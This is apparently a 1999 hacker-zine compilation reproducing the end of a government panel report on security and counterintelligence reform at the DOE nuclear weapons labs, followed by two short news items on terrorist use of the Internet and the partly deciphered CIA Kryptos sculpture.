Certainly at the top, but also throughout the organization. The leaders and managers set the standards and expectations regarding performance and accountability. They are the foundation upon which a successful organizational culture is built. If management sets, demonstrates and enforces high standards for performance and accountability, there is a strong likelihood that the organization will follow. And, longevity is a key ingredient. For example, Daniel S. Goldin, Administrator of the National Aeronautics and Space Administration (NASA), was named to his post in the spring of 1992.
Goldin has won considerable acclaim for demanding nothing but the best from his employees, and thereby turning around a bureaucracy that had become ossified and recalcitrant to higher authority, including the President. He did not do it overnight, though. His “watch” is now seven years long and still going. By contrast, the average stay for an Energy Secretary has been about two and a half years; a Deputy Secretary, less than two years; and an Under Secretary, less than 18 months.[1]

CLARITY OF MISSION

Employees must know who they are and why they are there. Mission statements may seem corny to some, but from our experience good ones work. NASA’s is crisp, clear and bold: “NASA is an investment in America’s future. As explorers, pioneers and innovators, we boldly expand frontiers in air and space to inspire and serve America, and to benefit the quality of life on Earth.” The Energy Department also declares itself a department of the future; its slogan is “Science, Security and Energy: Powering the 21st Century.” However, we wonder if the DOE employees in the field really have a sense of purpose and direction. Those at the Oakland Operations Office are challenged to, “serve the public by executing programs and performing DOE contract management.” At Albuquerque Operations Office, the rallying cry is, “to contribute to the welfare of the nation by providing field-level federal management to assure effective, efficient, safe and secure accomplishment of the Department’s national defense, environmental quality, science and technology, technology transfer and commercialization and national energy objectives.”[2]

DEDICATION TO EXCELLENCE

It is the responsibility of leadership to emphasize continuously and top-to-bottom the absolute importance of quality of performance. People truly dedicated to excellence usually achieve it.

EMPHASIS ON CORE COMPETENCIES

Those agencies that constantly emphasize the business areas in which they must absolutely excel, usually do so. At NASA, we are told, rarely, if ever, does the Administrator give a speech in which safety is not emphasized. DOE has appropriately emphasized excellence in the quality of its scientific and technical work, but only recently has begun to emphasize security, and only in recent months has articulated the importance of counterintelligence. The panel was hard pressed to find either words mentioned in speeches by most of Secretary Richardson’s predecessors.

MINIMAL POLITICAL PRESSURES

Blessed is the government manager whose operations fall into only a handful of Congressional districts and under the purview of only a couple of oversight committees. It doesn’t take a nuclear scientist to understand that the more Congressional districts and committees with which a federal agency must contend, the more it is politically whip–sawed in its priorities and stuffed with pork. We suspect the Department of Energy probably holds some federal records: its multitudinous and widely cast operations come under the scrutiny of no less than 18 Congressional committees and fund well-paying federal and contractor jobs in more than 50 congressional districts.

STREAMLINED FIELD OPERATIONS

In just about any endeavor, but especially in managing government contracts, simpler is better. Managing government contracts has become a major function in more and more agencies and departments as they seek to cut costs. We know of a few good examples of agencies where this effort is both efficient and effective. One is the National Reconnaissance Office (NRO), a semi-autonomous Defense Department agency, which has long managed huge contracts with major industrial firms that have built and help operate our nation’s surveillance satellites. The NRO, however, came under heavy fire several years ago for budget irregularities, partly as a result of tangled lines of bureaucratic authority. Today, after some substantial streamlining, multi-million dollar contracts are run out of program management offices at NRO Headquarters on a line of accountability leading directly to the contracting company. Rather than maintaining large field offices, the NRO employs only a handful of representatives in the field—typically only one or two people resident at their largest contractors. The rest is done from Washington. To manage their largest contracts, no more than 15 contracting officers—from worker–level to management—are involved. Some are worth several billion dollars. Currently, the NRO manages over 1,000 contracts worldwide, with a combined value numbering in the tens of billions of dollars. They manage these contracts using a staff of approximately 250 contract officers.[3]

Though we acknowledge that there are differences between the missions of NRO’s satellite contractors and DOE’s nuclear weapons lab contractors, we are stunned by the huge numbers of DOE employees involved in overseeing a weapons lab contract. For example, Sandia National Weapons Laboratory, a contractor–operated facility in New Mexico, has several layers of Energy Department employees with whom it must deal: the Kirtland (Air Force Base) Area Office, with about 55 “feds,” which is subordinate to the Albuquerque Field Office (AFO), which has a total complement of about 1,300 government workers. Albuquerque also monitors contracts with Los Alamos National Lab (through a Los Alamos Area Office of some 70 people), and several other contractors throughout the southern United States. Notably, Albuquerque is but one of 11 such DOE Field Offices, that boast a total field complement of about 6,000. Back at DOE Headquarters, which has a total work force of close to 5,000, Sandia’s contracts are monitored, depending on the subject, by several Program Offices—including Defense Programs (somewhat over 100 officials) and Environmental Management (somewhat over 200 officials). We repeatedly heard from officials at various levels of DOE and the weapons labs how this convoluted and bloated management structure has constantly transmitted confusing and often contradictory mandates to the labs. This is vividly illustrated by the labyrinthine organizational charts that one must decipher to trace lines of authority.

RESPONSIBILITY AND ACCOUNTABILITY IN SECURITY

One senior CIA official told us that the NRO security system is the best in the government—a view echoed, we understand, in a forthcoming report by the DCI/Defense Secretary Joint Security Commission. One can see why. At the NRO, security starts at the top. The chief of security provides policy guidance and monitors implementation. However, from the Director on down, all line managers are responsible for implementation. If a security breach occurs, the Director and appropriate line subordinates all are accountable. Similarly, NRO contractors are expected to meet fully NRO security standards and guidelines. Failure to meet those guidelines could well result in forfeiture of performance award fees, at the least.

FULL OPERATIONAL INTEGRATION

To be effective, security must be more than a concept, it must be woven into every aspect of the agency’s business and the daily work of every employee. The NRO integrates security more fully than most other federal agencies we have seen. Though it has separate line items for security and counterintelligence functions, most security–related expenditures are integrated directly into the line items of every satellite program. Thus, rather than imposing security mandates as contract “add-ons,” security officials work with the NRO managers to fold their requirements into a given program during the planning stages. In this structure, security requirements are as much a part of an NRO satellite program as are solar cells and thrusters.
And, the NRO security professionals, rather than treated as staff functionaries, are accepted as true partners in the NRO mission.

A PREVAILING CONSCIOUSNESS

Making people aware is vital. The record clearly shows that DOE has had mixed results from its various security and counterintelligence indoctrination programs. Briefings, town hall meetings and educational films are helpful, but they cannot take the place of a working environment in which security is just part of the daily routine. Again at the NRO, when a management decision is made, security always gets a voice. A security official is present at every level of NRO decision making: from the Office Director, to his Board of Directors, to the management teams of the smallest NRO program, security officials are part of the management process. Moreover, “security” gets a vote equal to that of any program manager. From the record, we judge that security at DOE, until recently, only occasionally had a voice; and when it did, many managers vociferously objected. Counterintelligence, on the other hand, was allowed little more than a whisper.

RESTRUCTURING

The panel is convinced that real and lasting security and counterintelligence reform at the weapons labs is simply unworkable within DOE’s current structure and culture. To achieve the kind of protection that these sensitive labs must have, they and their functions must have their own autonomous operational structure free of all the other obligations imposed by DOE management. We strongly believe that this cleaving can best be achieved by constituting a new government agency that is far more mission–focused and bureaucratically streamlined than its antecedent, and devoted principally to nuclear weapons and national security matters.

The agency can be constructed in one of two ways. It could remain an element of DOE but become semi-autonomous—by that we mean strictly segregated from the rest of the department. This would be accomplished by having the agency director report only to the Secretary of Energy. The agency directorship also could be “dual-hatted” as an Under Secretary, thereby investing it with extra bureaucratic clout both inside and outside the department. We believe there are several good models for this course of action: the National Security Agency and the Defense Advanced Research Projects Agency, both elements of the Defense Department; and the National Oceanographic and Atmospheric Administration, an agency of the Commerce Department. Alternatively, the agency could be completely independent, with its administrator reporting directly to the President. The National Aeronautics and Space Administration and the National Science Foundation are also good models.

Regardless of the mold in which this agency is cast, it must have staffing and support functions that are autonomous from the remaining operations at DOE. These functions, which report directly to the Director, must include: an inspector general; a general counsel; a human resources staff; a comptroller; a senior official responsible solely for security policy, and another responsible solely for counterintelligence policy. To protect its autonomy and avoid the diversion of funds to other purposes, the agency budget must be a separate line item strictly segregated by Congress from other budget pressures—even if it remains nominally within the current DOE structure. The agency also must have a separate employee career service. The panel recommends an “excepted service” model of employment, like many of the intelligence community elements, which would facilitate accountability and higher performance levels by allowing management to reward, punish, hire, and fire employees more easily. To ensure its long–term success, this new agency must be established by statute. That statute, moreover, must clearly stipulate that nothing less than an act of Congress can amend the agency’s mission, functions or affiliations.

Clearly, Congress and the President must decide definitively which of these two solutions to enact. The panel has no specific preference between them; we believe either can be made effective. Should Congress and the President conclude that retaining the agency inside DOE is not workable, the “wholly-independent” approach should be enacted. We emphasize that it is very important for the new structure to be organized to preserve and, if possible, enhance the ability of the national weapons labs to attract and retain scientists of the highest caliber. Excellence in the caliber of the scientists and their research and development programs must be sustained if the weapons labs are to fulfill their missions in the front line of U.S. national security. To meet this goal, continued but carefully controlled interaction with foreign visitors and scientists from around the world as well as with researchers from DOE’s nondefense labs is essential for producing the best science. In the semi-autonomous model, the Secretary would be responsible for managing and ensuring the effectiveness of agency relations with the nonweapons labs.

Whichever solution Congress enacts, we do feel strongly that the new agency never should be subordinated to the Defense Department. Defense already is populated with a number of semi–autonomous agencies; we see no reason to add to that burden. Moreover, we believe the decision made long ago to house America’s nuclear weapons research and development in a civilian government agency still makes sense.

Specifically, we recommend that the Congress pass and the President sign legislation that:

- Creates a new, semi–autonomous Agency for Nuclear Stewardship (ANS), whose Director will report directly to the Secretary of Energy. The Director should be dual–hatted as an Under Secretary of Energy. This new agency will oversee all nuclear weapons–related matters previously housed in DOE, including Defense Programs and Nuclear Nonproliferation; it also will oversee all functions of the National Weapons labs. (If Congress opts to create a totally independent agency, the Director should report directly to the President.)
- Streamlines the ANS/Weapons Lab management structure by abolishing ties between the weapons labs and all DOE regional, field and site offices, and all contractor intermediaries. The so–called “GOCO,” or “government owned, contractor operated,” concept of lab management should be retained. GOCO has been very successful, particularly in providing employment conditions that attract scientists of the highest caliber, and the federal government is strongly committed to maintaining that working relationship. Even if DOE opts to retain these field entities for other purposes, the ANS should sever all association with them. All ANS/Weapons Lab communications and business should be handled by ANS Liaison Offices established in each lab and manned with a small staff. (Our short review time did not permit us to explore fully this issue. We doubt that any amount of time would be sufficient. Suffice it to say that we did learn enough about the costs and benefits of these myriad DOE field bureaucracies to persuade us to recommend cutting all ties between them and the new agency.)
- Mandates that the Director/ANS be appointed by the President with the consent of the Senate and, ideally, have an extensive background in national security, organizational management, and appropriate technical fields. Admittedly, finding an individual with solid credentials in all three areas may prove an elusive goal. However, meeting two out of those three criteria should be considered mandatory, provided that one of the criteria always met is management experience.
The Deputy Director should have a background in an area that compensates for areas in which the Director lacks experience. The Director should serve for a minimum fixed term of 5 years, not coincident with quadrennial transitions of administrations, and be subject to removal only by Presidential direction. Stems the historical “revolving door” and management expertise problems at DOE by severely circumscribing the number of political appointees assigned to ANS and requiring all ANS senior political appointees to have strong backgrounds in both national security (intelligence, defense, or foreign policy) and management (corporate, government, or military). Ensures effective administration of safeguards, security, and counterintelligence at all the weapons labs and plants by creating a coherent security/CI structure within the new agency. We strongly recommend following the NRO’s model of security management. The senior CI official at ANS—we recommend a Special Assistant to the Director for CI policy—should be mandated as a permanent FBI senior executive service position. Abolishes the Office of Energy Intelligence. A Special Assistant to the ANS Director for Intelligence Liaison should be created within the new agency, with a staff of no more than 20. The Special Assistant should be responsible for managing relations with the intelligence community, briefing ANS senior management on intelligence matters, and ensuring ANS intelligence requirements are met. This office should follow the Treasury Department model. (The Secretary of Energy would not be precluded from establishing a similar special assistant to address the department’s non-weapons–related intelligence coordination and briefing needs.) Shifts the balance of analytic billets from the former Office of Energy Intelligence (about 40) to the DCI’s Nonproliferation Center to bolster intelligence community technical expertise on nuclear matters. 
These billets should be permanently funded by ANS, but permanently assigned to the DCI Center. Weapons lab employees and ANS civil servants should be temporarily assigned to these positions for two year tours. A Semi-Autonomous or Wholly Independent Nuclear Weapons Stewardship Agency should have the following attributes: The agency would be entirely separated from DOE, except in the semi-autonomous case, where the agency director—as a DOE Under Secretary—would report directly to the Secretary. The agency would have no other bureaucratic ties to DOE, other than R&D contracting, which would be managed by the agency Deputy Director. The weapons labs would be encouraged nonetheless to foster strong scientific interactions with the other DOE research labs. In the case of a wholly independent agency, the Director would be the chief executive officer. In the case of a semi-autonomous agency, the Director would be dual-hatted as a DOE Under Secretary. An independent oversight board would monitor performance and compliance to agency policies and guidelines, up and down the organizational structure. Authority from the agency Director to the weapons labs would run directly through the Deputy Director, who also would be dual-hatted as the Defense Programs Manager and, therefore, a manager of lab work. The security chief, directly reporting to the agency Director, would promulgate all security policies and guidelines for the agency and the weapons labs, including safeguards and cyber-security. The counterintelligence chief, also directly attached to the agency Director, would promulgate all counterintelligence policies and guidelines for the agency and the weapons labs. He/she also would manage the foreign visitors and assignments program. As Defense Programs Manager for the weapons labs, the agency Deputy Director would be responsible for ensuring the integration of all security and counterintelligence policies and guidelines into all weapons lab programs. 
Security officers and counterintelligence officers would be attached to all line offices, with heavy representation in Defense Programs, where full integration would occur. They also would be attached to all labs, in multiple numbers. Security and counterintelligence officers would report to their appropriate line managers on a day-to-day basis, but also report respectively to the agency security and counterintelligence chiefs on policy implementation issues. All policy implementation disputes would be referred back to the agency director for resolution. ADDITIONAL RECOMMENDATIONS There are a number of initiatives that must be undertaken immediately to start building a new agency culture and identity and restoring public confidence: Establish a clear mission and clear standards of excellence. The agency’s mission, and that of each subordinate unit, must be clearly articulated. Strong security and counterintelligence in addition to scientific achievement must be core elements of the mission. Similarly, clear standards of excellence must be established throughout the organization. Excellence must be the goal of scientists, engineers, technicians, and managers as well as security and counterintelligence officials. Establish a clear chain of accountability. There must be clear, simple, indelible lines of accountability from top to bottom. If a failure occurs, there must be a straightforward means for determining accountability—at all levels. Seeking consensus and advice is important, but ultimately a decision must be made by individuals, and those individuals should be held accountable. Hold leaders accountable. Accountability must be enforced, particularly among the agency managers who will form the backbone of the new agency and instill a new culture of excellence. Reward achievement. Criteria should be clear and rewards substantial. Protection of nuclear secrets and expansion of scientific knowledge should be among the most valued. 
Achievement must be judged on contribution to mission, not to program expansions or budget increases. Punish failure ... with severity, if necessary. Penalties should be tough, but fair and proportional. Laxity in protecting nuclear secrets and other sensitive information should be among the most severely punished. Train and educate. Establish a formal educational and training system to develop a professional cadre of career managers and leaders. Security and counterintelligence should be major parts of the core curriculum passed down to all lab personnel in regular briefings and training sessions. Do not forget the primary mission. Preserve and strengthen those agency attributes—including cutting edge research in the most advanced scientific fields—that will attract the finest talent in the nation. With respect to the weapons laboratories, continue to foster their unparalleled lead in intellectual excellence. But never lose sight that protecting the nation by securing its nuclear stockpile and nuclear secrets—through good science and good management—is Job Number One. While maintaining its autonomy, the agency should nonetheless emphasize continued close scientific interaction with the DOE research labs not engaged in weapons–related endeavors. In the semi–autonomous alternative, DOE should also be responsible for ensuring that good relations are maintained between the non-weapons labs and the weapons labs. SECURITY AND COUNTERINTELLIGENCE ACCOUNTABILITY Accountability. The agency director should issue clear security accountability guidelines. The agency security chief must be accountable to the agency director for security policy at the labs, and the lab directors must be accountable to the agency director for compliance. The same system and process should be established to instill accountability among counterintelligence officials. Independent Oversight. 
Attentive, independent oversight will be critical to ensuring high standards of security and counterintelligence performance at the new agency. In that regard, we welcome Senator John Warner’s recent legislative initiative to create a small, dedicated panel to oversee security and counterintelligence performance at the weapons labs. This oversight should include an annual certification process. Joint Committee for Congressional Oversight of ANS/Labs. Congress should abolish its current oversight system for the national weapons labs. Just as the profligate morass of DOE contractors and bureaucrats has frustrated the critical national interest of safeguarding our nuclear stockpile, so has the current scheme of Congressional oversight with roughly 15 competing committees laying claim to some piece of the nuclear weapons mission. ANS Inspector General. The President, Congress, and the director of the new agency should cooperatively, through executive order, legislation, and agency directive, provide teeth to the authority of the new agency’s inspector general. For example, the inspector general, the independent oversight body, and the agency director should all have to concur on the findings of the annual report to the President on safeguards and security at the weapons labs. EXTERNAL RELATIONS The CIA and FBI should expand their “National Security Partnership” to include the new agency and the weapons labs. Reciprocal assignment programs should be implemented to promote cross-fertilization of expertise and experience. CIA and DIA should bolster their support for ANS needs. Both intelligence agencies should establish analytic accounts to support the specific substantive and counterintelligence interests and needs of the new ANS and the weapons labs. These accounts, among other issues, should regularly produce data on the nuclear–related collection efforts of all foreign governments and foreign intelligence services. 
This data should serve as the foundation for regularized weapons lab counterintelligence briefs for the foreign visits/foreign visitors programs. Improve national security and law enforcement cooperation, particularly with respect to counterintelligence case referrals and handling. The National Security Council should take the lead in establishing clear Executive Branch guidelines and procedures for resolving disputes between agencies over law enforcement and national security concerns. A government–wide process needs to be established by which competing interests can be adjudicated by officials who are properly informed of all relevant facts and circumstances, but who also are sufficiently senior to make decisions stick. Ensure a government–wide review of legal tools to address the current foreign intelligence threat. The National Security Council should conduct a review to ensure that sufficient legal authority and techniques are available and appropriate in light of the evolution of a very sophisticated threat and the ongoing revolution in information systems. PERSONNEL SECURITY An effective personnel security program. The agency director should immediately undertake a total revamping of the “Q” clearance program and look to the security elements in the intelligence community for advice and support. This review should result in a complete rewrite of existing guidance and standards for the issuing, revoking and suspending of security clearances. Special attention should be paid to establishing a clear—and relatively low—threshold for suspending clearances for cause, including pending criminal investigations. The review also should significantly strengthen the background investigation process by restructuring contracts to create incentives for thoroughness. 
We strongly advocate abolishing the prevalent method of paying investigators “by the case.” Strict “need–to–have” regulations should be issued for regular reviews of all contract employees’ clearance requirements. Those without a continuing need should have their clearances withdrawn. The National Security Council should review and resolve issues on a government–wide basis that permit a person who is under FBI investigation for suspected espionage to obtain a new or renewed clearance; existing standards for clearance renewal also should be reviewed with an eye toward tightening up. A professional administrative inquiry process. Promulgate new agency guidelines and standards for security–related administrative inquiries to ensure that proper security/counterintelligence procedures and methods are employed. Very high professional qualification standards should be established and strictly maintained for all security personnel involved in administrative inquiries. PHYSICAL/TECHNICAL/CYBERSECURITY Comprehensive weapons lab cyber–security program. Under the sponsorship and specific guidance of the agency Director, the weapons labs should institute a broad and detailed program to protect all computer workstations, networks, links and related systems from all forms of potential compromise. This program, which should be reviewed by and coordinated with appropriate offices within the U.S. intelligence community, must include standard network monitoring tools and uniform configuration management practices. All lab computers and networks must be constantly monitored and inspected for possible compromise, preferably by an agency–sponsored, independent auditing body. A “best practices” review should be conducted yearly by the appropriate agency security authority. Comprehensive classified document control system. Document controls for the most sensitive data of the weapons labs should be reinstituted by the agency Director. 
The program should be constantly monitored by a centralized agency authority to ensure compliance. A comprehensive classification review. The new agency, in coordination with the intelligence community, should promulgate new, concise, and precise classification guidance to define and ensure awareness of information and technologies that require protection. This guidance should clear up the widespread confusion over what is export–controlled information; what information, when joined with other data, becomes classified; and the differences between similarly named and seemingly boundless categories such as “unclassified controlled nuclear information” and “sensitive but unclassified nuclear information.” BUSINESS ISSUES Make security an integral part of doing business. Security compliance must be a major requirement in every agency contract with the weapons labs. Rather than a detailed list of tasks, the contract should make clear the security and counterintelligence standards by which the lab will be held accountable. It is the responsibility of the lab to develop the means to achieve those objectives. If a lab fails to conform to these standards and requirements, the agency should withhold performance award fees. Review the process for lab management contracts. If the agency director has reason to open the bidding for lab management contracts, we strongly recommend an intensive market research effort. Such an effort would help ensure that legitimate and competent bidders, with strong records for productive research and development, participate in the competition. Weapons labs foreign visitors program. This productive program should continue, but both the agency and the weapons labs, in concert, must ensure that secrets are protected. 
This means precise policy standards promulgated by the agency to ensure: the integrity of the secure areas and control over all foreign visitors and assignees; a clear demarcation between secure and open areas at the labs; strong enforcement of restrictions against sensitive foreign visitors and assignees having access to secure facilities; and sensible but firm guidelines for weapons lab employees’ contacts with foreign visitors from sensitive countries. Exceptions should be made by the agency director on a case–by–case basis. Clear, detailed standards should be enforced to determine whether foreign visits and appointments receive approval. The burden of proof should be placed on the employees who propose to host visitors from sensitive countries. Visits should be monitored by the labs and audited by an independent office. The bottom line: treat foreign visitors and assignees with the utmost courtesy, but assume they may well be collecting information for other governments. Foreign travel notification. The agency should institute a program whereby all agency and weapons lab employees in designated sensitive positions must make written notification of official and personal foreign travel well before departure. The agency must keep close records of these notifications and also ensure that effective counterintelligence briefings are provided to all such travelers. Unless formally granted an exception, scientists for weapons labs should travel in pairs on official visits to sensitive countries. Counterintelligence. The FBI should explore the possibility of expanding foreign counterintelligence resources in its field offices nearby the weapons labs. The panel offers additional thoughts for improving the Department’s CI efforts in the Classified Appendix to this report. 
ENDNOTES CHAPTER: ROOT CAUSES 1 The Department of Energy National Weapons Labs and Plants discussed in this report are: Lawrence Livermore National Lab, California; Los Alamos National Lab, New Mexico; Sandia National Lab, New Mexico; PANTEX Plant, Texas; Kansas City Plant, Missouri; Oak Ridge (Y-12) Plant, Tennessee. 2 Boyer, Paul. By the Bomb’s Early Light: American Thought and Culture at the Dawn of the Atomic Age. Chapel Hill: University of North Carolina Press, 1985, p. 138. 3 National Science Foundation, “Science and Engineering Indicators,” 1996. 4 National Science Foundation, “Data Brief,” Vol. 1996, No. 9, August 19, 1999. 5 Classified report. 6 Classified DOE Report. 7 DOE, “Annual Report to Congress, 1978,” April 1979. 8 U.S. Nuclear Command and Control System Support Staff, “Assessment Report: Department of Energy Nuclear Weapons-Related Security Oversight Process,” March 1998. CHAPTER: RECURRING VULNERABILITIES 1 U.S. Nuclear Command and Control System Support Staff, “Assessment Report: Department of Energy Nuclear Weapons-Related Security Oversight Process,” March 1998. 2 Classified DOE Report. 3 Classified DOE Report. 4 Classified DOE Report. 5 Classified DOE Report. 6 DOE, Office of Counterintelligence, “The Foreign Intelligence Threat to Department of Energy Personnel, Facilities and Research, Summary Report,” August 1990. 7 Classified U.S. Government report. 8 GAO/RCED-97-229, “Department of Energy: DOE Needs to Improve Controls Over Foreign Visitors to Weapons Laboratories,” September 25, 1997. 9 Hewlett, Richard G. and Francis Duncan, “Atomic Shield: A History of the U.S. Atomic Energy Commission,” May 1969. 10 Classified DOE report. 11 DOE, “Office of Safeguards and Security, Report to the Secretary: Status of Safeguards and Security,” February 1993. 12 Classified FBI document. 13 Classified U.S. Government report. 14 Classified DOE report. 
15 DOE, “Office of Safeguards and Security, Status of Safeguards and Security, Fiscal Year 1993,” January 1994 (U). 16 DOE/IG-385, “Special Audit Report on the Department of Energy’s Arms and Military-Type Equipment,” February 1, 1996. 17 Classified DOE report. 18 DOE, “Annual Report to the President on the Status of Safeguards and Security at Domestic Nuclear Weapons Facilities,” September 1996. 19 GAO/RCED-91-12, “Nuclear Safety: Potential Security Weaknesses at Los Alamos and Other DOE Facilities,” October 1990 (U) and GAO/RCED-92-39, “Nuclear Security: Safeguards and Security Weaknesses at DOE’s Weapons Facilities,” December 13, 1991. 20 GAO/RCED-90-122, “Nuclear Security: DOE Oversight of Livermore’s Property Management System is Inadequate,” April 18, 1990. 21 GAO/”Key Factors Underlying Security Problems at DOE Facilities,” (Statement of Victor S. Rezendes, Director, Energy, Resources and Science Issues, Resources, Community, and Economic Development Division, GAO, in testimony before the Subcommittee on Oversight and Investigations, Committee on Commerce, House of Representatives), April 20, 1999. 22 GAO/”Key Factors Underlying Security Problems at DOE Facilities,” (Statement of Victor S. Rezendes, Director, Energy, Resources and Science Issues, Resources, Community, and Economic Development Division, GAO, in testimony before the Subcommittee on Oversight and Investigations, Committee on Commerce, House of Representatives), April 20, 1999. 23 Classified DOE report. 24 Hewlett, Richard G. and Francis Duncan, “Atomic Shield, A History of the United States Atomic Energy Commission,” May 1969. 25 GAO/RCED-89-34, “Nuclear Security: DOE Actions to Improve the Personnel Clearance Program,” November 9, 1988. 26 DOE/IG/WR-O-90-02, “Nevada Operations Office Oversight of Management and Operating Contractor Security Clearances,” March 1990. 27 Classified DOE report. 
28 DOE/IG/WR-B-91-08, “Review of Contractor’s Personnel Security Clearances at DOE Field Office, Albuquerque,” September 1991. 29 DOE, “Office of Safeguards and Security, Report to the Secretary: Status of Safeguards and Security,” February 1993. 30 DOE, “Office of Safeguards and Security, Status of Safeguards and Security, Fiscal Year 1995,” January 1996. 31 Classified U.S. Government report. 32 Classified DOE report. 33 GAO/RCED-92-39, “Nuclear Security: Safeguards and Security Weaknesses at DOE Weapons Facilities,” December 13, 1991. 34 Classified DOE report. 35 Classified DOE report. 36 DOE, “Office of Safeguards and Security, Status of Safeguards and Security, Fiscal Year 1993,” January 1994 (U). 37 DOE, “Office of Safeguards and Security, Status of Safeguards and Security, Fiscal Year 1994,” January 1995 (U). 38 Classified DOE report. 39 Classified DOE report. 40 Classified DOE report. 41 Classified DOE report. 42 Classified DOE report. 43 New York Times, “Abstract,” August 5, 1977. 44 DOE, “Plutonium: The First 50 Years. United States Plutonium Production, Acquisition, and Utilization from 1944 Through 1994.” 45 GAO/RCED-92-39, “Nuclear Security: Safeguards and Security Weaknesses at DOE’s Weapons Facilities,” December 13, 1991. 46 GAO/RCED/AIMD-95-5, “Nuclear Nonproliferation: U.S. International Nuclear Materials Tracking Capabilities are Limited,” December 27, 1994. 47 GAO/AIMD-95-165, “Department of Energy: Poor Management of Nuclear Materials Tracking Capabilities Are Limited,” August 3, 1995. 48 DOE, “Office of Safeguards and Security, Status of Safeguards and Security, Fiscal Year 1995,” January 1996. 49 U.S. Nuclear Command and Control System Support Staff, “Assessment Report: Department of Energy Nuclear Weapons-Related Security Oversight Process,” March 1998. 50 GAO/RCED-89-31, “Major Weaknesses in Foreign Visitor Controls at Weapons Laboratories,” October 11, 1988. 51 Classified U.S. Government report. 
52 GAO/RCED-97-229, “Department of Energy: DOE Needs to Improve Controls Over Foreign Visitors to Weapons Laboratories,” September 25, 1997. 53 Classified DOE report. 54 GAO/RCED-97-229, “Department of Energy: DOE Needs to Improve Controls Over Foreign Visitors to Weapons Laboratories,” September 25, 1997 55 GAO/RCED-97-229, “Department of Energy: DOE Needs to Improve Controls Over Foreign Visitors to Weapons Laboratories,” September 25, 1997. 56 DOE, “Response to the Cox Committee Report: The Benefits of Department of Energy International Scientific and Technical Exchange Programs,” April 1999. 57 GAO/RCED-99-19, “Department of Energy: Problems in DOE’s Foreign Visitors Program Persist,” October 6, 1998. CHAPTER: ASSESSMENTS 1 In April 1997, the FBI Director met with Secretary Pena, who had taken office in March, to deliver a highly critical FBI assessment of DOE’s counterintelligence program. In June, DOE officials briefed the Special Assistant to the President and Senior Director for Nonproliferation and Export Controls. In July, the FBI Director and the Director of Central Intelligence expressed serious concern that DOE had not moved to implement the recommendations in the FBI report. 2 The National Counterintelligence Policy Board (NACIPB) was created by a 1994 Presidential Decision Directive to serve as the National Security Council’s primary mechanism to develop an effective national counterintelligence program. Current core NACIPB members include senior representatives from the Director of Central Intelligence /Central Intelligence Agency, the Federal Bureau of Investigation, the Department of Defense, the Department of State, the Department of Justice, the military departments’ CI organizations, the National Security Council, and, as of 1997, the Department of Energy and NSA. CHAPTER: REORGANIZATION 1 DOE, “Department of Energy First Tier Organizations, Terms of Office,” undated. 2 DOE, Field Fact Book, May 1998. 
3 Unclassified organizational data provided by National Reconnaissance Office. [End] Conversion to HTML by JYA/Urban Deadline. See also PDF version of Unclassified Annex: http://jya.com/pfiab-appx.pdf @HWA 63.0 Terrorists Use the Net ~~~~~~~~~~~~~~~~~~~~~~ June 18th 1999 From HNN http://www.hackernews.com/ contributed by Anonymous Since everyone else does it terrorists do too. Terrorists are using the net as a means of communication, collaboration, and information dissemination. Sharing technology and spreading information to followers via the internet has become a necessary way of doing business. Web sites are new weapons terrorists are adding to their armory. A good quote from this article, "We cannot just make a law that will stop them from using it." Computer Currents http://www.currents.net/newstoday/99/06/15/news13.html Daily News Terrorism Via The Net By Erwin Lemuel G Oliva, Metropolitan Computer Times June 15, 1999 Almost every sector in society has exploited the Internet. Unfortunately, not everyone has good intentions. Terrorists now use the Internet as means of communication and collaboration, said Mike Coldrick, a bomb technician and anti-terrorism expert from Scotland Yard during the recent ASEAN Defense Technology Exchange forum in Manila. "Modern terrorists travel by jet plane, communicate to followers by satellite telephone, and recruit and spread messages via the Internet," Coldrick states in a paper he presented during the forum. Technology has changed the face of terrorist organizations. Coldrick noted, saying that there is growing evidence that terrorists are currently using the latest means of communication, such as the Internet, to disseminate terrorist literature and doctrine. In the same way, terrorist groups also use the Internet to transfer terrorist technology to other groups all over the world. 
"Lately, the Colombian revolutionary group, FARC, have produced stand off weapons and heavy mortars to a design very similar to those produced by the Provisional Irish Republican Army. No doubt this technology was passed on by PIRA-trained Basques (separatist group from Spain). Or did the Colombian group find it on the Internet?" asked Coldrick. Most often terrorist groups are able to create improvised explosive devices and other weaponry using locally available materials. In some instances, they buy them from international black markets. The latter, however, entails a lot of risk, said Coldrick. Coldrick laments that despite the advances in technology, terrorist groups' activities are not generally monitored due to legal issues such as privacy. "We cannot just make a law that will stop them from using it," he said. "It is important for people to exchange information about the activities of terrorists," he added. The International Association of Bomb Technicians and Investigators and the World Explosives Ordnance Disposal (EOD) Foundation, of which Coldrick is president, actively exchange e-mail and hold discussion groups over the Net. "In 41 years of my practice, I'll still find new things on the Internet," he remarked.
@HWA 64.0 Beat the CIA at their own game? 
     - crypto sculpture cracking
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     June 18th 1999

     From HNN http://www.hackernews.com/

     CIA Crypto Sculpture
     contributed by lamer

     There is an encoded sculpture in the Langley courtyard, and now there is a public challenge to see if someone in the general public can crack the code before the CIA (of course, they have had a 10 year head start).

     ABC News
     http://www.abcnews.go.com/onair/WorldNewsTonight/wnt9990615_ciacode.html

     By John Martin
     ABCNEWS.com

     L A N G L E Y, Va., June 15 — Behind the Central Intelligence Agency’s headquarters, there’s a secret message waiting to be decoded. To the delight of its creator, artist Jim Sanborn of Washington, the message remains a mystery to the agency and the hundreds of employees who relax in the courtyard where his sculpture stands.

     “I don’t know that it will ever be totally figured out,” says Sanborn.

     Only William Webster, CIA director at the time the sculpture was erected, was given the decoded text, and he locked it in the office safe when he left the agency in 1991.

     A Break in the Case

     But finally, after all these years, there’s been a break. An analyst at the agency has deciphered part of the message. In fact, he’s deciphered two parts of the message. The CIA public affairs office is quick to point out that each employee works to unravel the puzzle on his own time. Presumably, the agency’s computers, or those of the code-breaking National Security Agency, could unlock the message in a matter of hours or days.

     David Stein, a 38-year-old CIA physicist, working at home nights and weekends for about 400 hours, has deciphered all but 97 of the letters. This is part of what he deciphered: “They used the earth’s magnetic field. The information was gathered and transmitted underground to an unknown location.”

     What location? If you know the code, the coordinates are there. “Thirty-eight degrees, 57 minutes, 6.5 seconds, north. 77 degrees, 8 minutes, 44 minutes west. ID’ed by rows,” reads Stein. That is the approximate location of the sculpture.

     We showed retired CIA cryptographer Ed Scheidt Stein’s work. Scheidt says Stein is on the right track. And he should know — Scheidt is the one who taught the artist how to encode his message.

